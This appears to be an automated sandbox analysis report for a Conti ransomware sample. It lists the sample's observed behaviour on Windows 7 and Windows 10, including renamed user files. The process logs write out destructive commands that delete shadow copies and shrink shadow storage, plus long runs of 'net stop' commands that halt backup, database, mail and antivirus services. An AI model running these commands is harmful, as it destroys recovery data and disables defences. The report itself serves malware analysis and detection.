Analysis Overview
SHA256
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24
Threat Level: Known bad
The file 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe was found to be: Known bad.
Malicious Activity Summary
Conti Ransomware
Deletes shadow copies
Modifies extensions of user files
Drops desktop.ini file(s)
Enumerates connected drives
Interacts with shadow copies
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Analysis: static1
Detonation Overview
Reported
2022-05-09 15:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-09 15:19
Reported
2022-05-09 15:21
Platform
win7-20220414-en
Max time kernel
40s
Max time network
45s
Command Line
Signatures
Conti Ransomware
Deletes shadow copies
Modifies extensions of user files
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File renamed | C:\Users\Admin\Pictures\MergeUnlock.png => C:\Users\Admin\Pictures\MergeUnlock.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnableOpen.tif => C:\Users\Admin\Pictures\EnableOpen.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnablePublish.png => C:\Users\Admin\Pictures\EnablePublish.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SplitCompress.tif => C:\Users\Admin\Pictures\SplitCompress.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WatchSearch.png => C:\Users\Admin\Pictures\WatchSearch.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompareRemove.tif => C:\Users\Admin\Pictures\CompareRemove.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PublishConvertTo.raw => C:\Users\Admin\Pictures\PublishConvertTo.raw.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnlockEnter.crw => C:\Users\Admin\Pictures\UnlockEnter.crw.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
Drops desktop.ini file(s)
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\D: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\f: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQL Backups" /y
C:\Windows\SysWOW64\net.exe
net stop "SQL Backups" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQL Backups" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PROD /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop msftesql$PROD /y
C:\Windows\SysWOW64\net.exe
net stop msftesql$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
net stop NetMsmqActivator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EhttpSrv /y
C:\Windows\SysWOW64\net.exe
net stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ekrn /y
C:\Windows\SysWOW64\net.exe
net stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ESHASRV /y
C:\Windows\SysWOW64\net.exe
net stop ESHASRV /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AVP /y
C:\Windows\SysWOW64\net.exe
net stop AVP /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop klnagent /y
C:\Windows\SysWOW64\net.exe
net stop klnagent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop wbengine /y
C:\Windows\SysWOW64\net.exe
net stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfefire /y
C:\Windows\SysWOW64\net.exe
net stop mfefire /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-09 15:19
Reported
2022-05-09 15:21
Platform
win10v2004-20220414-en
Max time kernel
129s
Max time network
136s
Command Line
Signatures
Conti Ransomware
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\ConvertClear.crw => C:\Users\Admin\Pictures\ConvertClear.crw.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FindInitialize.png => C:\Users\Admin\Pictures\FindInitialize.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StartConvertFrom.tiff => C:\Users\Admin\Pictures\StartConvertFrom.tiff.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\AssertExpand.tif => C:\Users\Admin\Pictures\AssertExpand.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BackupResize.tif => C:\Users\Admin\Pictures\BackupResize.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\HideDisable.png => C:\Users\Admin\Pictures\HideDisable.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WatchAssert.raw => C:\Users\Admin\Pictures\WatchAssert.raw.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\StartConvertFrom.tiff | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
Drops desktop.ini file(s)
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe
"C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Acronis VSS Provider" /y
C:\Windows\SysWOW64\net.exe
net stop "Acronis VSS Provider" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Enterprise Client Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Enterprise Client Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Enterprise Client Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQLsafe Backup Service" /y
C:\Windows\SysWOW64\net.exe
net stop "SQLsafe Backup Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQLsafe Filter Service" /y
C:\Windows\SysWOW64\net.exe
net stop "SQLsafe Filter Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Veeam Backup Catalog Data Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
net stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
net stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop Antivirus /y
C:\Windows\SysWOW64\net.exe
net stop Antivirus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ARSM /y
C:\Windows\SysWOW64\net.exe
net stop ARSM /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecRPCService /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop bedbg /y
C:\Windows\SysWOW64\net.exe
net stop bedbg /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop DCAgent /y
C:\Windows\SysWOW64\net.exe
net stop DCAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EPSecurityService /y
C:\Windows\SysWOW64\net.exe
net stop EPSecurityService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EPUpdateService /y
C:\Windows\SysWOW64\net.exe
net stop EPUpdateService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EraserSvc11710 /y
C:\Windows\SysWOW64\net.exe
net stop EraserSvc11710 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EsgShKernel /y
C:\Windows\SysWOW64\net.exe
net stop EsgShKernel /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop FA_Scheduler /y
C:\Windows\SysWOW64\net.exe
net stop FA_Scheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop IISAdmin /y
C:\Windows\SysWOW64\net.exe
net stop IISAdmin /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop IMAP4Svc /y
C:\Windows\SysWOW64\net.exe
net stop IMAP4Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IMAP4Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop McShield /y
C:\Windows\SysWOW64\net.exe
net stop McShield /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop McTaskManager /y
C:\Windows\SysWOW64\net.exe
net stop McTaskManager /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfemms /y
C:\Windows\SysWOW64\net.exe
net stop mfemms /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfevtp /y
C:\Windows\SysWOW64\net.exe
net stop mfevtp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MMS /y
C:\Windows\SysWOW64\net.exe
net stop MMS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
net stop mozyprobackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MsDtsServer /y
C:\Windows\SysWOW64\net.exe
net stop MsDtsServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MsDtsServer100 /y
C:\Windows\SysWOW64\net.exe
net stop MsDtsServer100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MsDtsServer110 /y
C:\Windows\SysWOW64\net.exe
net stop MsDtsServer110 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeES /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeES /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeIS /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeMTA /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeMTA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeSA /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeSRS /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeSRS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$TPS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
